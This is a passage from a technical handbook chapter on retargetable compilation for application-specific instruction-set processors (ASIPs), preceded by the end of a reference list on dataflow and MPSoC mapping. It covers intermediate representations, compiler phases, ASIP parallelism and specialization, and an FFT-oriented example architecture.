Schwarzer T, Weichslgartner A, Glaß M, Wildermann S, Brand P, Teich J (2017) Symmetry-
eliminating design space exploration for hybrid application mapping on many-core architec-
tures. IEEE Trans Comput-Aided Des Integr Circuits Syst 37(2):297–310
Sérot J (2020) HoCL: high level specification of dataflow graphs. In: Proceedings of the
32nd international symposium on implementation and application of functional languages
(IFL 2020) University of Kent, pp 244–253. https://www.cs.kent.ac.uk/events/2020/ifl20/
ifl2020draftproceedings.pdf
Singh AK, Kumar A, Srikanthan T (2011) A hybrid strategy for mapping multiple throughput-
constrained applications on MPSoCs. In: 2011 proceedings of the 14th international conference
on compilers, architectures and synthesis for embedded systems (CASES). IEEE, pp 175–184
Stemmer R, Vu H-D, Grüttner K, Le Nours S, Nebel W, Pillement S (2020) Towards probabilistic
timing analysis for SDFGs on tile based heterogeneous MPSoCs
Stuijk S, Geilen M, Theelen B, Basten T (2011) Scenario-aware dataflow: modeling, analysis
and implementation of dynamic applications. In: 2011 international conference on embedded
computer systems: architectures, modeling and simulation. IEEE, pp 404–411
Synopsys Signal Processing WorkSystem (SPW) (2013) The Fastest Path from Innovation to
Implementation of Digital Signal Processing Systems. http://www.eigen.in/pdf/SPW.pdf
Synopsys System Studio (2010) https://news.synopsys.com/index.php?s=20295&item=123136
Teich J, Henkel J, Herkersdorf A, Schmitt-Landsiedel D, Schröder-Preikschat W, Snelting G (2011)
Invasive computing: an overview. In: Multiprocessor system-on-chip. Springer, New York, NY,
pp 241–268
The Multicore Association, Inc (2015) Software-hardware interface for multi-many-core (SHIM)
specification, V1.0. The Multicore Association, Inc
Thiele L, Chakraborty S, Naedele M (2000) Real-time calculus for scheduling hard real-time
systems. In: 2000 IEEE international symposium on circuits and systems (ISCAS), vol 4. IEEE,
pp 101–104
Thiele L, Bacivarov I, Haid W, Huang K (2007) Mapping applications to tiled multiprocessor
embedded systems. In: ACSD’07: proceedings of the seventh international conference on
application of concurrency to system design. IEEE Computer Society, Washington, DC, pp 29–
40. ISBN: 0-7695-2902-X. https://doi.org/10.1109/ACSD.2007.53
Tretter A (2018) On efficient data exchange in multicore architectures. PhD thesis. ETH Zurich,
206pp. https://www.research-collection.ethz.ch/handle/20.500.11850/309314
Van Stralen P, Pimentel AD (2010) A high-level microprocessor power modeling technique based
on event signatures. J Sig Process Syst 60(2):239–250
Van Stralen P, Pimentel AD (2010) A trace-based scenario database for high-level simulation
of multimedia MPSoCs. In: 2010 international conference on embedded computer systems:
architectures, modeling and simulation. IEEE, pp 11–19
Weichslgartner A, Wildermann S, Gangadharan D, Glaß M, Teich J (2018) A design-time/run-
time application mapping methodology for predictable execution time in MPSoCs. ACM Trans
Embed Comput Syst (TECS) 17(5):89
Wilhelm R, Engblom J, Ermedahl A, Holsti N, Thesing S et al (2008) The worst-case execution-
time problem—overview of methods and survey of tools. ACM Trans Embed Comput Syst
7(3):1–53. ISSN: 1539-9087. https://doi.org/10.1145/1347375.1347389
Yviquel H, Lorence A, Jerbi K, Cocherel G, Sanchez A, Raulet M (2013) Orcc: Multi-
media development made easy. In: Proceedings of the 21st ACM international conference on
multimedia MM’13. ACM, Barcelona, pp 863–866. ISBN: 978-1-4503-2404-5. https://doi.org/
10.1145/2502081.2502231
Yviquel H, Sanchez A, Mickaël R, Casseau E (2017) Multi-core runtime for dynamic dataflow
video decoders, Technical Report. IETR/INSA Rennes, IRISA, Inria Rennes. https://hal.
archives-ouvertes.fr/hal-01503378
Retargetable Compilation
32
Gert Goossens, Dirk Lanneer, Johan Van Praet, and Werner Geurts
Contents
Introduction and Historical Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1148
Compiler Construction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1149
Compiler Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1149
Retargetable Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1151
Outline of This Chapter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1153
Anatomy of a Compiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1153
Intermediate Representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1153
Compilation Phases and Dependencies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1154
Architectural Scope of ASIPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1161
Parallelism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1162
Specialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1164
Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1166
Retargetable Compilers for ASIPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1167
Processor Intermediate Representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1170
Retargetable Compiler Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1171
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1185
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1186
Abstract
Keywords
Compiler Construction
The history of software compilation spans more than half a century. Early compilers
were merely translation tools that turned source language statements into small
sequences of assembly code. Specific local optimizations were then applied to
the assembly code, referred to as peephole optimizations. The translation process
would use custom-made translation rules for the specific processor target. Around
the early 1980s, compiler construction became a more established engineering
discipline, focusing on general-purpose CPUs. Central to these developments
were the introduction of reusable concepts like intermediate representation (IR)
formats and a more common understanding of compilation phases, as well as
a basic foundation of optimization algorithms used in those phases (see section
“Compilation Phases and Dependencies”). This knowledge accumulated in several
reference textbooks on compiler construction. Somewhat iconic was the “Dragon”
textbook, nicknamed after its cover image (Aho et al. 1986). Its more recent revision
continues to be a basis of many compiler courses today (Aho et al. 2007). Other
often-cited compiler textbooks include (Muchnick 1997; Morgan 1998; Fischer and
LeBlanc 1991; Allen and Kennedy 2001).
Compiler Frameworks
Retargetable Compilers
Retargetable compilers may reuse elements from compiler frameworks like GCC
or LLVM. However, the compiler architecture necessarily differs in certain aspects,
especially when it comes to the automatic retargeting of the compiler back end (code
generator). The authors contend that the term retargetable compiler is sometimes
used incorrectly to refer to compiler frameworks.
Retargetable compilation emerged as a dedicated field out of compiler research
in the mid-1990s. Relevant research work can be found in an early contributed
volume (Marwedel and Goossens 1995), in proceedings of subsequent editions of
the International Workshop on Code Generation for Embedded Processors, later
renamed into SCOPES (International Workshop on Software and Compilers for
Embedded Systems n.d.), and in more recent survey works such as (Leupers and
Marwedel 2013).
As of 2000, the development of retargetable compilers based on ADLs spurred
the introduction of broader methodologies and tools that encompassed the entire
design cycle of ASIP architectures. The idea behind such methodologies is that
designers can rapidly explore the performance of an ASIP architecture by describing
it in an ADL, use the retargetable compiler to compile representative application
benchmarks on the architecture, and measure the performance of the generated
code. By profiling the generated code, architectural hotspots can be identified, which
reveal opportunities for tuning the ASIP architecture modeled in the ADL, for the
intended application domain. Such a rapid architectural exploration cycle is only
feasible if retargeting the compiler is an instantaneous process, which is not the
case with standard compiler frameworks. A number of commercial ASIP design
solutions have become available, such as Synopsys’ ASIP Designer tool (Synopsys
n.d.-b), Cadence’s extensible processor IP product called Xtensa (Cadence n.d.-b),
and the Codasip Studio tool (Codasip n.d.-b). In addition to a retargetable compiler,
ASIP design tools typically also contain instruction-set simulation and register-
32 Retargetable Compilation 1153
transfer level (RTL) hardware generation tools that work from the same ADL as
the retargetable compiler.
The concept of ASIPs and the interest in retargetable ASIP design tools has
recently been reinforced by the emergence of RISC-V, an open-source processor
architecture technology (Waterman and Asanović 2019; Waterman et al. 2021).
One of RISC-V’s use models is as a baseline architecture to which designers can
add domain-specific extension instructions. The RISC-V instruction-set architecture
reserves opcode space to encode such extension instructions. ADL models of
RISC-V have been developed, and ASIP design tools are being used to explore
instruction extensions and to automatically obtain a compiler, simulator, and
RTL implementation of the extended RISC-V processor (Synopsys 2022; Codasip
n.d.-a).
This chapter discusses retargetable compilers for ASIPs. As a basis for the
discussion, section “Anatomy of a Compiler” first provides an introduction into the
structure of compilers for general-purpose processors, as commonly understood in
the engineering community. Section “Architectural Scope of ASIPs” zooms in on
the architectural scope of ASIPs, which differs from general-purpose processors
in several aspects and therefore imposes specific requirements on retargetable
compilers for ASIPs. Section “Retargetable Compilers for ASIPs” then describes
how these requirements can be addressed by combining existing and new compiler
technologies.
Anatomy of a Compiler
Compilers transform application source code into executable code for the pro-
cessor target in multiple steps, referred to as compilation phases. Within such
compilation phases, specific optimization algorithms may be applied. Information
about the application code is represented in an internal data structure, called
intermediate representation (IR). Throughout the compilation process the IR is
gradually transformed and refined to reflect successive decisions taken by the
compiler. Section “Intermediate Representations” provides a short introduction on
IRs. Section “Compilation Phases and Dependencies” discusses optimization phases
in more detail.
Intermediate Representations
the machine code for the application in assembly or binary form. The IR can reside
in computer memory, but many compilers also allow the dumping of the IR in text
or binary files (for example, in LLVM’s bit-code format) at intermediate points, and
the reading of these files to resume the compilation process.
After the initial parsing of the application source code and the initial data-flow
analysis (see sections “Front End” and “Middle End”) the IR often takes a form that
explicitly denotes the following information:
1. Linear code sequences called basic blocks, composed of operations and informa-
tion on their mutual data dependencies. Examples of such representations are:
• Static single-assignment (SSA) form (Cytron et al. 1991). This is essentially
a collection of assignment statements in which each assigned variable has a
unique name. Two statements have a data dependency when they respectively
write and read the same named variable.
• Data-flow graphs (DFGs) (Dennis 2011). These are directed graphs in which
nodes represent operations and edges represent data dependencies between
them.
2. Control dependencies between the basic blocks. These are typically represented
in a directed graph called control-flow graph.
For example, the GCC and LLVM compilers’ initial phases use SSA forms
combined with a control-flow graph. ASIP Designer’s retargetable compiler uses
a control and data-flow graph (CDFG) model, which nests data-flow graphs in a
control-flow graph (Van Praet 1997).
More recently, enhanced IRs with support for domain-specific compilation have
been proposed. An example is the multilevel intermediate representation (MLIR)
(Lattner et al. 2021), which uses enhanced data-flow graph models with support for
loop structure and memory layout transformations, offered within a compiler frame-
work that supports language-specific transformations and optimizations. MLIR has
been used to build compilers for domain-specific programming languages like
TensorFlow used for machine learning applications, among others.
authors would refer to the four stages (left hand) as compilation phases, others
would consider the more detailed steps (right hand) as compilation phases. In this
chapter, the latter convention is followed.
Compilation phases are often executed in a predetermined sequence. However,
the compiler may apply mechanisms for phase coupling, i.e., the fact that mutual
dependencies between phases must be accounted for to generate efficient executable
code. This may be achieved by using predictors for a late phase’s optimization result
in an earlier phase, by backtracking from a late to an earlier compilation phase, or
by applying certain phases multiple times in a full compilation pass.
Front End
The compiler front end parses all application source files and builds an IR repre-
sentation for them. Parsing consists of lexical, syntax, and semantic analysis steps
(Grune and Jacobs 1990). Well-known parser generation tools include Lex/Yacc
(Levine et al. 1992), Flex/Bison (Levine 2009), and ANTLR (Parr 2007). Prior
to actual parsing, a language preprocessor may be called. This is essentially a
language-independent tool that can perform tasks like conditional activation of code
portions, header file inclusion, and macro expansion.
1156 G. Goossens et al.
Middle End
The compiler middle end performs optimizations on the IR that are in principle
applicable regardless of the processor target. In reality, some optimizations may only
make sense if the processor target contains certain instructions or hardware features,
and thus may be omitted if this is not the case. The optimizations are implemented
in distinct compilation phases. Some of the most common compilation phases are
described next.
Data-Flow Analysis
This initial phase builds the SSA form or data-flow graph and the control-flow graph,
which represent the application source code. An important part of the analysis is
to determine the valid data dependencies between operations that define named
variables and operations that use named variables. The input is an IR description
that represents a sequential order of statements (assuming that the source code
is described in a sequential language like C or C++). For every assignment and
every use of a given variable, also a reaching definitions analysis is carried out,
to determine if the variable will not intermediately be overwritten by another
assignment. If a variable is assigned multiple times, each assignment gets a unique
variable instance name, and all uses of the variable are replaced by uses of the right
instance. Data-flow analysis is important to enable the exploitation of instruction-
level parallelism (see instruction scheduling phase in the compiler back end, in
section “Back End”).
Alias analysis (also known as points-to analysis or memory reference disam-
biguation) is another important part of data-flow analysis. It deals with memory
references in the application source code in the form of global or static variables
or of pointers. It checks whether two memory references can ever refer to the same
memory location, in which case a dependency must be assumed if at least one of the
references is a write-to-memory operation. An example of alias analysis (explained
using C code) is shown in Fig. 3.
Address Generation
In this phase, address expressions are introduced for global and static variables in the
application code that are to be stored in memories, considering the addressing modes
that are available on the processor target. The computed results of these address
Fig. 4 Pointer analysis, assuming that the processor supports indexed addressing (bottom left) or
indirect addressing wtth pointer post-modification (bottom right). In the latter case, arrays A[] and
B[] can be accessed with independent pointers that are induction variables. Note: This example
assumes a word-addressable memory, with int mapping into a single word
Control-Flow Optimization
This phase deals with control-flow statements in the source code, represented in
the application’s control-flow graph. Multiple optimizations can be applied, aiming
at the generation of faster or more compact machine code. A few examples are
discussed next.
Function in-lining is a process whereby function calls are substituted by the
instantiated body of the function that was called. This avoids the overhead associated
with the subroutine call and return mechanisms that would traditionally be used
to implement function calls, at the expense of increased code size. After in-
lining, each instance of the function will be optimized specifically within its own
context. C and C++ compilers can be given hints to perform function in-lining by
annotating function calls with the inline specifier in the application source code.
Many compilers use heuristics to decide about the automatic in-lining of functions.
Another control-flow optimization relates to the implementation of switch state-
ments. Small switch statements can be implemented as conditional branches, but for
larger ones the compiler may introduce an array of pointers to different parts of the
code in program memory, called a jump table.
A final control-flow optimization example is the replacement of a jump-based
implementation of small-size if-then-else blocks of code by either speculative or
predicated execution. In case of speculative execution, the operations in both the
then and the else branch are executed unconditionally followed by a conditional
selection of the results. This requires that the processor target has a conditional
select instruction. In case of predicated execution, the operations in both branches
are executed but they are guarded by opposite conditions. This requires that
the processor target has guarded instructions, i.e., instructions with an additional
Boolean input that determines if the results will be actually stored.
Loop Transformation
Loops (such as for-loops and while-loops) are control-flow statements in the source-
code language that specify iteration. By default, a loop can be implemented with a
conditional branch instruction that jumps back to the entry point as long as the
conditional loop test evaluates true. In the loop transformation phase, the compiler
may decide to implement loops in more efficient ways. Some processors offer
zero-overhead loops, whereby a loop test based on a loop counter is executed
transparently in hardware while the instructions from the loop body are executing.
The compiler determines which for-loops from the application can be implemented
using zero-overhead loops. Only a limited number of nested for-loops can be
mapped into zero-overhead loops, due to capacity limitations of the loop test
hardware.
Certain processors support single-instruction multiple-data (SIMD) processing,
a form of data-level parallelism with instructions operating on vector datatypes.
In such cases, the loop transformation phase in the compiler may try to introduce
auto-vectorization, i.e., transform loops with scalar code into vector code. Auto-
vectorization has roots in early Fortran compilers (Allen and Kennedy 1987), is
supported for sub-word parallelism (also known as packed SIMD) in compilers for
32 Retargetable Compilation 1159
CPUs like Intel MMX (Bik et al. 2002), and is being researched for wider use cases,
for example, in LLVM (LLVM Project n.d.-c).
Expression Optimization
Multiple optimizations can be applied to arithmetic and logic expressions repre-
sented in the IR, with the aim to generate faster or more compact machine code. A
few examples are discussed next.
• Strength reduction replaces operations with equivalent but less expensive ones.
For example, in case of array index expressions in loops, multiplications can
often be replaced by additions.
• Constant folding is the process of recognizing and evaluating constant expres-
sions at compile time rather than computing them at runtime. Terms in constant
expressions are typically simple literals, such as the integer literal 2, but they may
also be variables of which the value is known at compile time.
• Common sub-expression elimination is an optimization that searches for
instances of identical expressions (i.e., they all evaluate to the same value) and
analyzes whether it is worthwhile replacing them with a single variable holding
the computed value.
• Dead-code elimination removes expressions from the program of which the
result is never used.
Back End
The back end of the compiler, also called the code generator, is the stage in the
compiler where the optimized IR is mapped into a sequence of machine instructions
for the target processor. As mentioned before, compiler frameworks typically
assume that target-specific back ends are built, which may reuse some common
infrastructure or optimizations. In the context of ASIP design tools, the concepts and
technologies used in the back end had to be reconsidered, to enable fast automatic
retargetability of the back end within a wide scope of ASIP architectures. This
will be addressed in sections “Architectural Scope of ASIPs” and “Retargetable
1160 G. Goossens et al.
Compilers for ASIPs”. Nonetheless, the definition of compilation phases in the back
end as known from compiler construction still applies.
For the purposes of this chapter, the following compilation phases are dis-
tinguished (details are described in sections “Code Selection” to “Instruction
Scheduling”):
• Code selection. This phase partitions the IR into small patterns of operations,
referred to as operation bundles, that can each be implemented in a single
instruction of the processor target. Typically, the operations in one such pattern
are connected by data dependencies.
• Register allocation. This phase allocates the variables that constitute inputs or
outputs of operation bundles to storage locations in the processor, i.e., to registers
or data memories.
• Register assignment. This is sometimes considered part of register allocation.
Most processors have register files, i.e., groups of registers with common read
and write ports of which the individual register fields can be directly addressed
from the instruction word. Register assignment then refers to the selection of
individual registers fields for variables allocated to the same register file.
• Instruction scheduling. This phase orders the execution of the operation bundles
in time. The objective typically is to determine an instruction schedule that
minimizes the number of instruction cycles required to execute the application.
To that effect, the scheduler must exploit the instruction-level parallelism that is
supported by the processor. On the one hand, the scheduler will try to overlap the
execution of consecutive instructions by applying instruction pipelining. On the
other hand, if the processor supports instruction-word parallelism the scheduler
will try to schedule multiple operation bundles in parallel, merging them into a
single parallel instruction.
Linker
Once all source files in a program have been compiled to object files, the linker
combines these object files into a single executable file. This may also include any
precompiled library functions that were called from the application source code. An
important function of the linker is to substitute all references to data and program
memories that occur in the object files, with absolute addresses in these memories.
This is called relocation.
Since the linker has a view on the code from the complete program, there is a
potential for performing so-called whole-program optimizations in the linker. For
example, the compiler’s middle end may already have performed function in-lining
on the code that stems from a single source file. At link time, the linker may
perform additional in-lining of functions defined in one source file at the point
where they are called in another source file. It is however not obvious for the
linker to undo sophisticated optimizations that were already applied at file level
in the compiler’s middle end and back end. Compilers like GCC and LLVM offer
32 Retargetable Compilation 1161
a link-time optimization option, which delays such optimizations to the linker. The
linker is given access to higher-level IRs for code from multiple source files. It then
combines them into a single IR representing the whole program, and calls the middle
end again to apply its optimizations.
Linkers sometimes also perform local optimizations to reduce the code size
(i.e., number of bytes in program memory) of the eventual executable. Reverse
in-lining is an optimization that searches for instruction sequences in the code
that occur multiple times in the exact same form, and replaces each occurrence of
such a sequence by a call to a subroutine that implements the sequence once. This
slightly increases the application’s cycle count due to the subroutine call and return
overhead.
Many models and techniques for compiler construction that have been developed
over time and found their way into popular compiler frameworks like GCC
and LLVM (see section “Anatomy of a Compiler”) were originally intended
for general-purpose CPUs. Typical architectural characteristics of general-purpose
CPUs include:
• They have a single central register file of which all the register fields are equally
accessible as sources or destinations of arithmetic and logic instructions.
• The allowed sizes (i.e., number of bits) of data types are restricted to powers of 2.
• There is (only) a single address space for memories.
• Memories are (only) byte addressable.
• There is no distinction between memory address (i.e., pointer) and integer
datatypes.
• Instruction-word parallelism is restricted. CPUs often (only) support the sequen-
tial execution of instructions that do not control parallel functional units,
albeit that some CPUs may support dynamic multi-issuing of such instruction
sequences onto a limited number of parallel units.
It can be noted that GCC and LLVM have been ported to processor architec-
tures with different characteristics, but only at the expense of significant custom
development.
While ASIP architectures often reuse a number of architectural features from
general-purpose CPU architectures, they typically differ in many respects. Figure 5
lists various features that, in the authors’ view, can be found in the instruction-set
architecture (ISA) of contemporary ASIP architectures.
Two dimensions are distinguished in the optimization space: parallelism and spe-
cialization. ASIPs will typically combine selected elements from both dimensions,
yielding superior performance for the targeted application domain.
1162 G. Goossens et al.
Parallelism
Instruction-Level Parallelism
Instruction-level parallelism (ILP) can be achieved by combining instruction
pipelining and instruction-word parallelism.
cycles (also called interlocks) to resolve hazards. More frequently, ASIPs use an
exposed pipeline, where the compiler must schedule instructions in such a way
as to avoid hazards, if needed by inserting software stalls (i.e., no-operation or
nop instructions). This has the advantage of better cycle-time predictability at
compile time. Additionally, a common mechanism to eliminate hazards due to
data dependencies in ASIPs is to add bypass networks for register files, which
can directly feed computational results of one instruction to the inputs of a
subsequent instruction before the results are actually stored in the register file.
(b) Instruction-word parallelism
This implies that multiple operations can be executed concurrently on different
functional units, controlled from a single instruction in the program. These
parallel instructions are selected and scheduled statically, i.e., at compile time,
by the compiler.
The instruction word can be orthogonal, meaning that it is composed of
multiple fields (also called slots) that each controls one such functional unit.
This typically results in a very-long instruction-word (VLIW) architecture.
ASIPs however often support instruction-word parallelism in encoded instruc-
tion words. In this case, only those combinations of parallel operations are
supported that are considered useful for the application domain. The supported
combinations can be encoded in a shorter instruction word, which saves space in
program memory and reduces power that would otherwise be consumed in large
instruction fetches. ASIPs may also have variable-length instructions, with
short instructions encoding mostly single operations and longer instructions
encoding parallel operations and immediate values (i.e., constants loaded from
program memory).
Note that the concept of dynamic multi-issuing, whereby the processor
hardware tries to execute instructions from a sequential stream in parallel
(as in superscalar processors), is less common in ASIP architectures. Multi-
issuing results in less predictable performance, which is undesirable as ASIP
applications typically have real-time performance constraints.
Data-Level Parallelism
This form of parallelism is useful for application domains with large datasets in
which identical operations must be applied to multiple data items. Examples include
pixels in an image or a video frame, or subcarriers in an OFDM wireless modem.
By organizing the data in vectors, and letting single instructions apply the same
operation concurrently to all vector elements, high performance can be reached
while keeping the instruction word short. This is referred to as vector processing
or single-instruction multiple-data (SIMD) processing.
Some architectures may introduce sub-word parallelism by mapping vectors with
narrow elements onto regular data words, such as four 8-bit elements onto a 32-bit
word. This is referred to as packed SIMD. Most ASIPs with SIMD support however
contain separate functional units, registers, and memories that support significantly
wider vectors. Today the term wide SIMD is often used to refer to vector sizes on the
order of 1Kbits or higher. ASIPs often support multiple combinations of vector size
1164 G. Goossens et al.
and element word length mapped on the same processor resources. For example, a
512-bit data path may support both vectors with 32 elements of 16 bits each and
vectors with 16 elements of 32 bits each.
Task-Level Parallelism
Whereas ILP and SIMD aim at exploiting parallelism in a single thread of control,
task-level parallelism refers to the parallel execution of multiple threads of control
(i.e., independently evolving program parts or tasks). One such solution is a
multicore architecture, in which every core is an ASIP that may be optimized for
its tasks. An alternative solution is a single ASIP that supports multithreading. In
this case, multiple tasks are interleaved using the same functional units. Typically,
but not necessarily, each task uses its own set of registers.
Specialization
Datatypes
In addition to the built-in datatypes offered by the application programming
language, ASIP architects can introduce any application-specific datatypes. They
can be primitive datatypes that are physically supported by the processor resources,
or else they have to be expanded into primitive datatypes during the lowering phase
in the compiler’s middle end (see section “Middle End”).
Typical examples of datatypes on ASIPs include integer, fractional, floating-
point, bit strings, complex, and vector (SIMD) types. These datatypes are not
restricted to sizes that are powers of two but can have any number of bits that
best suit the application domain. To reduce power consumption and silicon area,
the ASIP architect may reduce datatype sizes to the minimum number that still
supports the dynamic range required by the applications. For example, convolutional
neural network applications often require less than 8-bit precision to represent
intermediate-layer data without affecting the classification accuracy (Moons et al.
2016). On the other side of the spectrum, high-performance SIMD architectures
may have resources carrying vectors of hundreds of bits (see section “Parallelism”).
The interpretation of the bits can be customized. For example, different from
the IEEE 754 standard for floating-point arithmetic, one may define a floating-point
datatype with custom sizes for mantissa and exponent, or without support for special
numbers and exceptions if those are not required by the application. ASIPs for
machine learning applications may support the bfloat16 format (Wang and Kanwar
2019).
Functional Units
Functional units are the resources that implement the ASIP’s primitive functions.
ASIPs often have an arithmetic and logic functional unit (ALU), with primitive
32 Retargetable Compilation 1165
parallel with the operations in the functional units. However, in some cases, direct
memory operands may be preferred.
The storage architecture (i.e., registers and local data memories) of an ASIP
and the connectivity between functional units and storages are often chosen such
that they mimic typical data-flow patterns from the application code. Such ASIP
architectures often have multiple specialized data memories and small distributed
register files or individual registers that are locally connected to inputs and outputs
of functional units. This is referred to as a heterogeneous storage architecture. As
a result, these data-flow patterns can be mapped to the architecture with minimal
overhead in terms of the required data moves, resulting in highly efficient code.
As mentioned in section “Parallelism”, there is often a desire to keep instruction
words relatively short, in order to save space in program memory and reduce
power consumption. Distributed, locally connected register files help to reduce
the instruction word length, as they only require few opcode bits. In ASIPs with
high amounts of instruction-word parallelism, further reductions can be obtained
by only allowing sub-ranges of register files as operand or result registers, and by
introducing register coupling. Examples of the latter are instructions for which the
destination register is always equal to one of the operand registers (referred to as a
read-modify-write instruction), and instructions that always use the same index for
their left and right operand register files.
Example
Figure 6 shows an example ASIP architecture optimized for FFT and DFT
algorithms in wireless baseband applications, taken from (Brockmeyer 2010;
Goossens 2021). It illustrates several of the ASIP architectural features introduced in
Fig. 6 Functional units, storages, and interconnect architecture of an example ASIP optimized for
FFT and DFT, illustrating multiple forms of parallelism and specialization
32 Retargetable Compilation 1167
sections “Parallelism” and “Specialization”. The ASIP is optimized for the efficient
implementation of the Good-Thomas prime-factor algorithm for DFT.
The example ASIP is a SIMD architecture with a vector size of 192 bits,
composed of 6 elements of 32 bits. Each element represents a complex number with
16 bits for both the real and the imaginary part. The choice of 6 elements stems from
the fact that all DFT sizes that must be supported in the prime-factor algorithm are
multiples of 6. By exploiting this fact, a smaller silicon area and power consumption
can be obtained than what is possible with general-purpose vector processors.
The ASIP has three specialized functional units. VU0 implements special primi-
tive functions for butterfly operations. VU1 implements basic vector multiplications
but also more complex operation patterns like vsummul(), which adds the results
of two complex vector multiplications and occurs frequently in the application
code. The vector multiplier is a two-cycle pipelined multiplier. VU2 is a dedicated
functional unit for implementing special radix computations.
The ASIP has two separate vector memories that can be accessed in parallel: DM
for data and CM for coefficients. Each memory comes with its own AGU (not shown
in the figure), supporting indirect addressing modes with pointer post-modifications.
The ASIP’s heterogeneous storage architecture is visible in the figure. Multiple
small register files of different sizes are locally connected to inputs and outputs of
functional units. Register files V[] and T[] are both partitioned in a lower and a
higher sub-range with half the number of fields. While some instructions can access
the full register file, others can only access sub-ranges (as indicated by black, red,
and blue colors in the figure).
The ASIP supports instruction-word parallelism in up to five parallel slots: three
slots dedicated to each of the functional units, and two slots dedicated to memory
loads and stores. The ASIP has variable-length instructions, shown in Fig. 7.
A 64-bit instruction format is used to encode instructions with five slots. A shorter
32-bit format is used to encode stand-alone (i.e., nonparallel) instructions for
control, memory loads and stores, and vector operations. Finally, a 16-bit format
is used for stand-alone scalar RISC instructions.
The ASIP has a four-stage instruction pipeline, composed of an instruction fetch,
an instruction decode, and two execution stages.
Fig. 7 Instruction formats of the example ASIP for FFT and DFT
While a retargetable compiler for ASIPs may reuse elements from estab-
lished compiler frameworks, its architecture and technology will differ in multiple
respects:
be viewed as mapping the (application) IR onto the processor IR. Processor IRs
are discussed below in section “Processor Intermediate Representations”.
• Optimization algorithms must be available that directly work on the processor
IR, and thus are applicable to any architecture that is described therein, cov-
ering the full scope of ASIP architectures, and that result in highly efficient
machine code. This mostly pertains to the back end of the compiler, which in
traditional compilers is often custom-made for the processor target. Optimization
algorithms in retargetable compilers are discussed below in section “Retargetable
Compiler Optimizations”.
Compiler frameworks like GCC and LLVM provide internal data structures that can
be refined and tuned by compiler engineers to capture information about the specific
processor target.
In case of LLVM, these data structures are C++ classes that can be specialized
per processor target, referred to as target description classes (LLVM Project n.d.-d).
The main class TargetMachine provides virtual methods to access processor-
specific information from more specific classes that contain information on parts
of the processor. Examples of such specific classes include:
As illustrated by the LLVM example above, but the same holds for GCC,
the processor IR in established compiler frameworks consists of a collection of
multiple representations, each geared at a different phase in the back end of the
compiler. By splitting information over multiple representations, some redundancy
is introduced which bears a risk of inconsistencies and thus may require extra
design and verification effort. Also, such a split poses some challenges in coping
with phase coupling efficiently. Besides this, the information in LLVM’s processor
IP is somewhat geared to general-purpose CPU architectures, which requires a
customization effort to support alternative architectures such as ASIPs.
While the information in the processor IR of LLVM or GCC can be understood
and entered by compiler engineers, this is less obvious to be accomplished by archi-
tecture designers who would benefit from retargetable compilation for architectural
exploration. Also, it is not straightforward to automatically generate a processor
IR in this format from an ADL that describes complete ASIP architectures from the
ground up. For ASIP architectures that are based on a predefined processor template
to which extension instructions can be added using an ADL, such an approach is
feasible though. An example of the latter is the Xtensa C compiler, which is based on
LLVM (Cadence n.d.-b), with automatic support of extension instructions defined
in the TIE ADL (Sanghavi and Andrews 2008).
Early research in retargetable compilers already explored alternative processor
IRs with the intention to generate them from an ADL. Among the more successful
32 Retargetable Compilation 1171
• Nodes representing storage elements are depicted as boxes with a black bound-
ary. They are labeled with the name of the storage, followed by its primitive data
type (between brackets). A distinction is made between “static” storages (nodes
with blue labels), which hold data until explicitly overwritten, and “transitory”
storages (nodes with black labels), which only hold data for a fixed time. Static
storages include controllable registers and memories. Transitory storages include
pipeline registers that have one cycle delay and wires (nets) that have zero delay.
• Nodes representing operations are depicted as colored boxes. The green boxes
represent primitive functions, and the red boxes represent data move operations.
They are labeled with a name and annotated with enabling conditions. The latter
are compact representations of the different binary encodings of the instruction
word that can enable the operation.
• Directed edges representing the connectivity are depicted in black. Combined,
these edges indicate how data can flow from storage, through operations, to
storage.
In this section, the different compilation phases are reviewed as already introduced
in section “Compilation Phases and Dependencies”, but now from an ASIP per-
1172 G. Goossens et al.
spective. Additional requirements are described for these phases, and how they
can be handled in a retargetable compiler that targets the broad scope of ASIP
architectures described in section “Architectural Scope of ASIPs”. Compared to
compilers for general-purpose CPUs, the most important differences can be found
in the retargetable back end of the compiler. Optimization algorithms in the
back end operate on a detailed model of the processor architecture coded in a
32 Retargetable Compilation 1173
processor IR that is automatically constructed from an ADL, such that the compiler
retargets instantaneously whenever changes are made to the ADL. The feature of
retargetability should however not compromise the generated machine code quality,
i.e., the code quality is expected to approximate that of custom-made compilers for
